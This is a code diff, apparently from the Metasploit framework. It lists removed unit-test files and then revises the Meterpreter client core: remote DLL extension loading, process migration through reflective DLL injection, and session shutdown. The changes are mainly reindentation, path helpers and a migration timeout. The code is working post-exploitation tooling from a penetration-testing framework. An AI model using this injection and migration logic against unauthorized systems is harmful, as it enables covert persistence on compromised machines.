  462. data/lib/rex/exploitation/omelet.rb.ut.rb +0 -27
  463. data/lib/rex/exploitation/opcodedb.rb.ut.rb +0 -280
  464. data/lib/rex/exploitation/seh.rb.ut.rb +0 -20
  465. data/lib/rex/file.rb.ut.rb +0 -17
  466. data/lib/rex/io/ring_buffer.rb.ut.rb +0 -135
  467. data/lib/rex/nop/opty2.rb.ut.rb +0 -24
  468. data/lib/rex/parser/arguments.rb.ut.rb +0 -68
  469. data/lib/rex/parser/ini.rb.ut.rb +0 -30
  470. data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +0 -18
  471. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +0 -39
  472. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +0 -37
  473. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb.ut.rb +0 -52
  474. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +0 -43
  475. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +0 -128
  476. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb.ut.rb +0 -64
  477. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/platform_util.rb.ut.rb +0 -29
  478. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb.ut.rb +0 -155
  479. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/type/pointer_util.rb.ut.rb +0 -128
  480. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +0 -124
  481. data/lib/rex/proto.rb.ts.rb +0 -9
  482. data/lib/rex/proto/dcerpc.rb.ts.rb +0 -10
  483. data/lib/rex/proto/dcerpc/client.rb.ut.rb +0 -492
  484. data/lib/rex/proto/dcerpc/handle.rb.ut.rb +0 -86
  485. data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +0 -42
  486. data/lib/rex/proto/dcerpc/packet.rb.ut.rb +0 -57
  487. data/lib/rex/proto/dcerpc/response.rb.ut.rb +0 -16
  488. data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +0 -47
  489. data/lib/rex/proto/drda.rb.ts.rb +0 -18
  490. data/lib/rex/proto/drda/constants.rb.ut.rb +0 -24
  491. data/lib/rex/proto/drda/packet.rb.ut.rb +0 -110
  492. data/lib/rex/proto/drda/utils.rb.ut.rb +0 -85
  493. data/lib/rex/proto/http.rb.ts.rb +0 -13
  494. data/lib/rex/proto/http/client.rb.ut.rb +0 -96
  495. data/lib/rex/proto/http/handler/erb.rb.ut.rb +0 -22
  496. data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +0 -1
  497. data/lib/rex/proto/http/handler/proc.rb.ut.rb +0 -25
  498. data/lib/rex/proto/http/header.rb.ut.rb +0 -47
  499. data/lib/rex/proto/http/packet.rb.ut.rb +0 -166
  500. data/lib/rex/proto/http/request.rb.ut.rb +0 -215
  501. data/lib/rex/proto/http/response.rb.ut.rb +0 -150
  502. data/lib/rex/proto/http/server.rb.ut.rb +0 -80
  503. data/lib/rex/proto/ntlm.rb.ut.rb +0 -181
  504. data/lib/rex/proto/rfb.rb.ut.rb +0 -40
  505. data/lib/rex/proto/smb.rb.ts.rb +0 -9
  506. data/lib/rex/proto/smb/client.rb.ut.rb +0 -224
  507. data/lib/rex/proto/smb/constants.rb.ut.rb +0 -19
  508. data/lib/rex/proto/smb/simpleclient.rb.ut.rb +0 -129
  509. data/lib/rex/proto/smb/utils.rb.ut.rb +0 -21
  510. data/lib/rex/proto/tftp/server.rb.ut.rb +0 -29
  511. data/lib/rex/service_manager.rb.ut.rb +0 -33
  512. data/lib/rex/socket.rb.ut.rb +0 -108
  513. data/lib/rex/socket/comm/local.rb.ut.rb +0 -76
  514. data/lib/rex/socket/parameters.rb.ut.rb +0 -52
  515. data/lib/rex/socket/range_walker.rb.ut.rb +0 -56
  516. data/lib/rex/socket/ssl_tcp.rb.ut.rb +0 -40
  517. data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +0 -62
  518. data/lib/rex/socket/subnet_walker.rb.ut.rb +0 -29
  519. data/lib/rex/socket/switch_board.rb.ut.rb +0 -53
  520. data/lib/rex/socket/tcp.rb.ut.rb +0 -65
  521. data/lib/rex/socket/tcp_server.rb.ut.rb +0 -45
  522. data/lib/rex/socket/udp.rb.ut.rb +0 -45
  523. data/lib/rex/test.rb +0 -36
  524. data/lib/rex/text.rb.ut.rb +0 -193
  525. data/lib/rex/transformer.rb.ut.rb +0 -39
  526. data/lib/rex/ui/text/color.rb.ut.rb +0 -19
  527. data/lib/rex/ui/text/progress_tracker.rb.ut.rb +0 -35
  528. data/lib/rex/ui/text/table.rb.ut.rb +0 -56
@@ -1,9 +1,11 @@
1
- #!/usr/bin/env ruby
2
1
  # -*- coding: binary -*-
3
2
 
4
3
  require 'rex/post/meterpreter/packet'
5
4
  require 'rex/post/meterpreter/extension'
6
5
  require 'rex/post/meterpreter/client'
6
+
7
+ # Used to generate a reflective DLL when migrating. This is yet another
8
+ # argument for moving the meterpreter client into the Msf namespace.
7
9
  require 'msf/core/payload/windows'
8
10
 
9
11
  module Rex
@@ -20,315 +22,329 @@ module Meterpreter
20
22
  ###
21
23
  class ClientCore < Extension
22
24
 
23
- #
24
- # Initializes the 'core' portion of the meterpreter client commands.
25
- #
26
- def initialize(client)
27
- super(client, "core")
28
- end
29
-
30
- ##
31
- #
32
- # Core commands
33
- #
34
- ##
35
-
36
- #
37
- # Loads a library on the remote meterpreter instance. This method
38
- # supports loading both extension and non-extension libraries and
39
- # also supports loading libraries from memory or disk depending
40
- # on the flags that are specified
41
- #
42
- # Supported flags:
43
- #
44
- # LibraryFilePath
45
- # The path to the library that is to be loaded
46
- #
47
- # TargetFilePath
48
- # The target library path when uploading
49
- #
50
- # UploadLibrary
51
- # Indicates whether or not the library should be uploaded
52
- #
53
- # SaveToDisk
54
- # Indicates whether or not the library should be saved to disk
55
- # on the remote machine
56
- #
57
- # Extension
58
- # Indicates whether or not the library is a meterpreter extension
59
- #
60
- def load_library(opts)
61
- library_path = opts['LibraryFilePath']
62
- target_path = opts['TargetFilePath']
63
- load_flags = LOAD_LIBRARY_FLAG_LOCAL
64
-
65
- # No library path, no cookie.
66
- if (library_path == nil)
67
- raise ArgumentError, "No library file path was supplied", caller
68
- end
69
-
70
- # Set up the proper loading flags
71
- if (opts['UploadLibrary'])
72
- load_flags &= ~LOAD_LIBRARY_FLAG_LOCAL
73
- end
74
- if (opts['SaveToDisk'])
75
- load_flags |= LOAD_LIBRARY_FLAG_ON_DISK
76
- end
77
- if (opts['Extension'])
78
- load_flags |= LOAD_LIBRARY_FLAG_EXTENSION
79
- end
80
-
81
- # Create a request packet
82
- request = Packet.create_request('core_loadlib')
83
-
84
- # If we must upload the library, do so now
85
- if ((load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL)
86
- image = ''
87
-
88
- ::File.open(library_path, 'rb') { |f|
89
- image = f.read
90
- }
91
-
92
- if (image != nil)
93
- request.add_tlv(TLV_TYPE_DATA, image, false, client.capabilities[:zlib])
94
- else
95
- raise RuntimeError, "Failed to serialize library #{library_path}.", caller
96
- end
97
-
98
- # If it's an extension we're dealing with, rename the library
99
- # path of the local and target so that it gets loaded with a random
100
- # name
101
- if (opts['Extension'])
102
- library_path = "ext" + rand(1000000).to_s + ".#{client.binary_suffix}"
103
- target_path = library_path
104
- end
105
- end
106
-
107
- # Add the base TLVs
108
- request.add_tlv(TLV_TYPE_LIBRARY_PATH, library_path)
109
- request.add_tlv(TLV_TYPE_FLAGS, load_flags)
110
-
111
- if (target_path != nil)
112
- request.add_tlv(TLV_TYPE_TARGET_PATH, target_path)
113
- end
114
-
115
- # Transmit the request and wait the default timeout seconds for a response
116
- response = self.client.send_packet_wait_response(request, self.client.response_timeout)
117
-
118
- # No response?
119
- if (response == nil)
120
- raise RuntimeError, "No response was received to the core_loadlib request.", caller
121
- elsif (response.result != 0)
122
- raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
123
- end
124
-
125
- commands = []
126
- response.each(TLV_TYPE_METHOD) { |c|
127
- commands << c.value
128
- }
129
-
130
- return commands
131
- end
132
-
133
- #
134
- # Loads a meterpreter extension on the remote server instance and
135
- # initializes the client-side extension handlers
136
- #
137
- # Module
138
- # The module that should be loaded
139
- #
140
- # LoadFromDisk
141
- # Indicates that the library should be loaded from disk, not from
142
- # memory on the remote machine
143
- #
144
- def use(mod, opts = { })
145
- if (mod == nil)
146
- raise RuntimeError, "No modules were specified", caller
147
- end
148
- # Get us to the installation root and then into data/meterpreter, where
149
- # the file is expected to be
150
- path = ::File.join(Msf::Config.install_root, 'data', 'meterpreter', 'ext_server_' + mod.downcase + ".#{client.binary_suffix}")
151
-
152
- if (opts['ExtensionPath'])
153
- path = opts['ExtensionPath']
154
- end
155
-
156
- path = ::File.expand_path(path)
157
-
158
- # Load the extension DLL
159
- commands = load_library(
160
- 'LibraryFilePath' => path,
161
- 'UploadLibrary' => true,
162
- 'Extension' => true,
163
- 'SaveToDisk' => opts['LoadFromDisk'])
164
- client.add_extension(mod, commands)
165
-
166
- return true
167
- end
168
-
169
- #
170
- # Migrates the meterpreter instance to the process specified
171
- # by pid. The connection to the server remains established.
172
- #
173
- def migrate( pid )
174
- keepalive = client.send_keepalives
175
- client.send_keepalives = false
176
- process = nil
177
- binary_suffix = nil
178
-
179
- # Load in the stdapi extension if not allready present so we can determine the target pid architecture...
180
- client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
181
-
182
- # Determine the architecture for the pid we are going to migrate into...
183
- client.sys.process.processes.each { | p |
184
- if( p['pid'] == pid )
185
- process = p
186
- break
187
- end
188
- }
189
-
190
- # We cant migrate into a process that does not exist.
191
- if( process == nil )
192
- raise RuntimeError, "Cannot migrate into non existent process", caller
193
- end
194
-
195
- # We cant migrate into a process that we are unable to open
196
- if( process['arch'] == nil or process['arch'].empty? )
197
- raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
198
- end
199
-
200
- # And we also cant migrate into our own current process...
201
- if( process['pid'] == client.sys.process.getpid )
202
- raise RuntimeError, "Cannot migrate into current process", caller
203
- end
204
-
205
- # Create a new payload stub
206
- c = Class.new( ::Msf::Payload )
207
- c.include( ::Msf::Payload::Stager )
208
-
209
- # Include the appropriate reflective dll injection module for the target process architecture...
210
- if( process['arch'] == ARCH_X86 )
211
- c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
212
- binary_suffix = "dll"
213
- elsif( process['arch'] == ARCH_X86_64 )
214
- c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
215
- binary_suffix = "x64.dll"
216
- else
217
- raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
218
- end
219
-
220
- # Create the migrate stager
221
- migrate_stager = c.new()
222
- migrate_stager.datastore['DLL'] = ::File.join( Msf::Config.install_root, "data", "meterpreter", "metsrv.#{binary_suffix}" )
223
-
224
- blob = migrate_stager.stage_payload
225
-
226
- if client.passive_service
227
-
228
- # Replace the transport string first (TRANSPORT_SOCKET_SSL
229
- i = blob.index("METERPRETER_TRANSPORT_SSL")
230
- if i
231
- str = client.ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
232
- blob[i, str.length] = str
233
- end
234
-
235
- conn_id = self.client.conn_id
236
- i = blob.index("https://" + ("X" * 256))
237
- if i
238
- str = self.client.url
239
- blob[i, str.length] = str
240
- end
241
-
242
- i = blob.index([0xb64be661].pack("V"))
243
- if i
244
- str = [ self.client.expiration ].pack("V")
245
- blob[i, str.length] = str
246
- end
247
-
248
- i = blob.index([0xaf79257f].pack("V"))
249
- if i
250
- str = [ self.client.comm_timeout ].pack("V")
251
- blob[i, str.length] = str
252
- end
253
- end
254
-
255
- # Build the migration request
256
- request = Packet.create_request( 'core_migrate' )
257
- request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
258
- request.add_tlv( TLV_TYPE_MIGRATE_LEN, blob.length )
259
- request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, blob, false, client.capabilities[:zlib])
260
- if( process['arch'] == ARCH_X86_64 )
261
- request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
262
- else
263
- request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
264
- end
265
-
266
- # Send the migration request (bump up the timeout to 60 seconds)
267
- response = client.send_request( request, 60 )
268
-
269
- if client.passive_service
270
- # Sleep for 5 seconds to allow the full handoff, this prevents
271
- # the original process from stealing our loadlib requests
272
- ::IO.select(nil, nil, nil, 5.0)
273
- else
274
- # Prevent new commands from being sent while we finish migrating
275
- client.comm_mutex.synchronize do
276
- # Disable the socket request monitor
277
- client.monitor_stop
278
-
279
- ###
280
- # Now communicating with the new process
281
- ###
282
-
283
- # Renegotiate SSL over this socket
284
- client.swap_sock_ssl_to_plain()
285
- client.swap_sock_plain_to_ssl()
286
-
287
- # Restart the socket monitor
288
- client.monitor_socket
289
- end
290
- end
291
-
292
- # Update the meterpreter platform/suffix for loading extensions as we may have changed target architecture
293
- # sf: this is kinda hacky but it works. As ruby doesnt let you un-include a module this is the simplest solution I could think of.
294
- # If the platform specific modules Meterpreter_x64_Win/Meterpreter_x86_Win change significantly we will need a better way to do this.
295
- if( process['arch'] == ARCH_X86_64 )
296
- client.platform = 'x64/win64'
297
- client.binary_suffix = 'x64.dll'
298
- else
299
- client.platform = 'x86/win32'
300
- client.binary_suffix = 'dll'
301
- end
302
-
303
- # Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
304
- client.ext.aliases.keys.each { |e|
305
- client.core.use(e)
306
- }
307
-
308
- # Restore session keep-alives
309
- client.send_keepalives = keepalive
310
-
311
- return true
312
- end
313
-
314
- #
315
- # Shuts the session down
316
- #
317
- def shutdown
318
- request = Packet.create_request('core_shutdown')
319
-
320
- # If this is a standard TCP session, send and return
321
- if not client.passive_service
322
- self.client.send_packet(request)
323
- else
324
- # If this is a HTTP/HTTPS session we need to wait a few seconds
325
- # otherwise the session may not receive the command before we
326
- # kill the handler. This could be improved by the server side
327
- # sending a reply to shutdown first.
328
- self.client.send_packet_wait_response(request, 10)
329
- end
330
- true
331
- end
25
+ #
26
+ # Initializes the 'core' portion of the meterpreter client commands.
27
+ #
28
+ def initialize(client)
29
+ super(client, "core")
30
+ end
31
+
32
+ ##
33
+ #
34
+ # Core commands
35
+ #
36
+ ##
37
+
38
+ #
39
+ # Loads a library on the remote meterpreter instance. This method
40
+ # supports loading both extension and non-extension libraries and
41
+ # also supports loading libraries from memory or disk depending
42
+ # on the flags that are specified
43
+ #
44
+ # Supported flags:
45
+ #
46
+ # LibraryFilePath
47
+ # The path to the library that is to be loaded
48
+ #
49
+ # TargetFilePath
50
+ # The target library path when uploading
51
+ #
52
+ # UploadLibrary
53
+ # Indicates whether or not the library should be uploaded
54
+ #
55
+ # SaveToDisk
56
+ # Indicates whether or not the library should be saved to disk
57
+ # on the remote machine
58
+ #
59
+ # Extension
60
+ # Indicates whether or not the library is a meterpreter extension
61
+ #
62
+ def load_library(opts)
63
+ library_path = opts['LibraryFilePath']
64
+ target_path = opts['TargetFilePath']
65
+ load_flags = LOAD_LIBRARY_FLAG_LOCAL
66
+
67
+ # No library path, no cookie.
68
+ if (library_path == nil)
69
+ raise ArgumentError, "No library file path was supplied", caller
70
+ end
71
+
72
+ # Set up the proper loading flags
73
+ if (opts['UploadLibrary'])
74
+ load_flags &= ~LOAD_LIBRARY_FLAG_LOCAL
75
+ end
76
+ if (opts['SaveToDisk'])
77
+ load_flags |= LOAD_LIBRARY_FLAG_ON_DISK
78
+ end
79
+ if (opts['Extension'])
80
+ load_flags |= LOAD_LIBRARY_FLAG_EXTENSION
81
+ end
82
+
83
+ # Create a request packet
84
+ request = Packet.create_request('core_loadlib')
85
+
86
+ # If we must upload the library, do so now
87
+ if ((load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL)
88
+ image = ''
89
+
90
+ ::File.open(library_path, 'rb') { |f|
91
+ image = f.read
92
+ }
93
+
94
+ if (image != nil)
95
+ request.add_tlv(TLV_TYPE_DATA, image, false, client.capabilities[:zlib])
96
+ else
97
+ raise RuntimeError, "Failed to serialize library #{library_path}.", caller
98
+ end
99
+
100
+ # If it's an extension we're dealing with, rename the library
101
+ # path of the local and target so that it gets loaded with a random
102
+ # name
103
+ if (opts['Extension'])
104
+ library_path = "ext" + rand(1000000).to_s + ".#{client.binary_suffix}"
105
+ target_path = library_path
106
+ end
107
+ end
108
+
109
+ # Add the base TLVs
110
+ request.add_tlv(TLV_TYPE_LIBRARY_PATH, library_path)
111
+ request.add_tlv(TLV_TYPE_FLAGS, load_flags)
112
+
113
+ if (target_path != nil)
114
+ request.add_tlv(TLV_TYPE_TARGET_PATH, target_path)
115
+ end
116
+
117
+ # Transmit the request and wait the default timeout seconds for a response
118
+ response = self.client.send_packet_wait_response(request, self.client.response_timeout)
119
+
120
+ # No response?
121
+ if (response == nil)
122
+ raise RuntimeError, "No response was received to the core_loadlib request.", caller
123
+ elsif (response.result != 0)
124
+ raise RuntimeError, "The core_loadlib request failed with result: #{response.result}.", caller
125
+ end
126
+
127
+ commands = []
128
+ response.each(TLV_TYPE_METHOD) { |c|
129
+ commands << c.value
130
+ }
131
+
132
+ return commands
133
+ end
134
+
135
+ #
136
+ # Loads a meterpreter extension on the remote server instance and
137
+ # initializes the client-side extension handlers
138
+ #
139
+ # Module
140
+ # The module that should be loaded
141
+ #
142
+ # LoadFromDisk
143
+ # Indicates that the library should be loaded from disk, not from
144
+ # memory on the remote machine
145
+ #
146
+ def use(mod, opts = { })
147
+ if (mod == nil)
148
+ raise RuntimeError, "No modules were specified", caller
149
+ end
150
+ # Get us to the installation root and then into data/meterpreter, where
151
+ # the file is expected to be
152
+ modname = "ext_server_#{mod.downcase}"
153
+ path = MeterpreterBinaries.path(modname, client.binary_suffix)
154
+
155
+ if (opts['ExtensionPath'])
156
+ path = opts['ExtensionPath']
157
+ end
158
+
159
+ path = ::File.expand_path(path)
160
+
161
+ # Load the extension DLL
162
+ commands = load_library(
163
+ 'LibraryFilePath' => path,
164
+ 'UploadLibrary' => true,
165
+ 'Extension' => true,
166
+ 'SaveToDisk' => opts['LoadFromDisk'])
167
+ client.add_extension(mod, commands)
168
+
169
+ return true
170
+ end
171
+
172
+ #
173
+ # Migrates the meterpreter instance to the process specified
174
+ # by pid. The connection to the server remains established.
175
+ #
176
+ def migrate( pid )
177
+ keepalive = client.send_keepalives
178
+ client.send_keepalives = false
179
+ process = nil
180
+ binary_suffix = nil
181
+
182
+ # Load in the stdapi extension if not allready present so we can determine the target pid architecture...
183
+ client.core.use( "stdapi" ) if not client.ext.aliases.include?( "stdapi" )
184
+
185
+ # Determine the architecture for the pid we are going to migrate into...
186
+ client.sys.process.processes.each { | p |
187
+ if( p['pid'] == pid )
188
+ process = p
189
+ break
190
+ end
191
+ }
192
+
193
+ # We cant migrate into a process that does not exist.
194
+ if( process == nil )
195
+ raise RuntimeError, "Cannot migrate into non existent process", caller
196
+ end
197
+
198
+ # We cant migrate into a process that we are unable to open
199
+ if( process['arch'] == nil or process['arch'].empty? )
200
+ raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
201
+ end
202
+
203
+ # And we also cant migrate into our own current process...
204
+ if( process['pid'] == client.sys.process.getpid )
205
+ raise RuntimeError, "Cannot migrate into current process", caller
206
+ end
207
+
208
+ # Create a new payload stub
209
+ c = Class.new( ::Msf::Payload )
210
+ c.include( ::Msf::Payload::Stager )
211
+
212
+ # Include the appropriate reflective dll injection module for the target process architecture...
213
+ if( process['arch'] == ARCH_X86 )
214
+ c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
215
+ binary_suffix = "x86.dll"
216
+ elsif( process['arch'] == ARCH_X86_64 )
217
+ c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
218
+ binary_suffix = "x64.dll"
219
+ else
220
+ raise RuntimeError, "Unsupported target architecture '#{process['arch']}' for process '#{process['name']}'.", caller
221
+ end
222
+
223
+ # Create the migrate stager
224
+ migrate_stager = c.new()
225
+ migrate_stager.datastore['DLL'] = MeterpreterBinaries.path('metsrv',binary_suffix)
226
+
227
+ blob = migrate_stager.stage_payload
228
+
229
+ if client.passive_service
230
+
231
+ # Replace the transport string first (TRANSPORT_SOCKET_SSL
232
+ i = blob.index("METERPRETER_TRANSPORT_SSL")
233
+ if i
234
+ str = client.ssl ? "METERPRETER_TRANSPORT_HTTPS\x00" : "METERPRETER_TRANSPORT_HTTP\x00"
235
+ blob[i, str.length] = str
236
+ end
237
+
238
+ conn_id = self.client.conn_id
239
+ i = blob.index("https://" + ("X" * 256))
240
+ if i
241
+ str = self.client.url
242
+ blob[i, str.length] = str
243
+ end
244
+
245
+ i = blob.index([0xb64be661].pack("V"))
246
+ if i
247
+ str = [ self.client.expiration ].pack("V")
248
+ blob[i, str.length] = str
249
+ end
250
+
251
+ i = blob.index([0xaf79257f].pack("V"))
252
+ if i
253
+ str = [ self.client.comm_timeout ].pack("V")
254
+ blob[i, str.length] = str
255
+ end
256
+ end
257
+
258
+ # Build the migration request
259
+ request = Packet.create_request( 'core_migrate' )
260
+ request.add_tlv( TLV_TYPE_MIGRATE_PID, pid )
261
+ request.add_tlv( TLV_TYPE_MIGRATE_LEN, blob.length )
262
+ request.add_tlv( TLV_TYPE_MIGRATE_PAYLOAD, blob, false, client.capabilities[:zlib])
263
+ if( process['arch'] == ARCH_X86_64 )
264
+ request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 2 ) # PROCESS_ARCH_X64
265
+ else
266
+ request.add_tlv( TLV_TYPE_MIGRATE_ARCH, 1 ) # PROCESS_ARCH_X86
267
+ end
268
+
269
+ # Send the migration request (bump up the timeout to 60 seconds)
270
+ client.send_request( request, 60 )
271
+
272
+ if client.passive_service
273
+ # Sleep for 5 seconds to allow the full handoff, this prevents
274
+ # the original process from stealing our loadlib requests
275
+ ::IO.select(nil, nil, nil, 5.0)
276
+ else
277
+ # Prevent new commands from being sent while we finish migrating
278
+ client.comm_mutex.synchronize do
279
+ # Disable the socket request monitor
280
+ client.monitor_stop
281
+
282
+ ###
283
+ # Now communicating with the new process
284
+ ###
285
+
286
+ # If renegotiation takes longer than a minute, it's a pretty
287
+ # good bet that migration failed and the remote side is hung.
288
+ # Since we have the comm_mutex here, we *must* release it to
289
+ # keep from hanging the packet dispatcher thread, which results
290
+ # in blocking the entire process. See Redmine #8794
291
+ begin
292
+ Timeout.timeout(60) do
293
+ # Renegotiate SSL over this socket
294
+ client.swap_sock_ssl_to_plain()
295
+ client.swap_sock_plain_to_ssl()
296
+ end
297
+ rescue TimeoutError
298
+ client.alive = false
299
+ return false
300
+ end
301
+
302
+ # Restart the socket monitor
303
+ client.monitor_socket
304
+
305
+ end
306
+ end
307
+
308
+ # Update the meterpreter platform/suffix for loading extensions as we may have changed target architecture
309
+ # sf: this is kinda hacky but it works. As ruby doesnt let you un-include a module this is the simplest solution I could think of.
310
+ # If the platform specific modules Meterpreter_x64_Win/Meterpreter_x86_Win change significantly we will need a better way to do this.
311
+ if( process['arch'] == ARCH_X86_64 )
312
+ client.platform = 'x64/win64'
313
+ client.binary_suffix = 'x64.dll'
314
+ else
315
+ client.platform = 'x86/win32'
316
+ client.binary_suffix = 'x86.dll'
317
+ end
318
+
319
+ # Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
320
+ client.ext.aliases.keys.each { |e|
321
+ client.core.use(e)
322
+ }
323
+
324
+ # Restore session keep-alives
325
+ client.send_keepalives = keepalive
326
+
327
+ return true
328
+ end
329
+
330
+ #
331
+ # Shuts the session down
332
+ #
333
+ def shutdown
334
+ request = Packet.create_request('core_shutdown')
335
+
336
+ # If this is a standard TCP session, send and return
337
+ if not client.passive_service
338
+ self.client.send_packet(request)
339
+ else
340
+ # If this is a HTTP/HTTPS session we need to wait a few seconds
341
+ # otherwise the session may not receive the command before we
342
+ # kill the handler. This could be improved by the server side
343
+ # sending a reply to shutdown first.
344
+ self.client.send_packet_wait_response(request, 10)
345
+ end
346
+ true
347
+ end
332
348
 
333
349
  end
334
350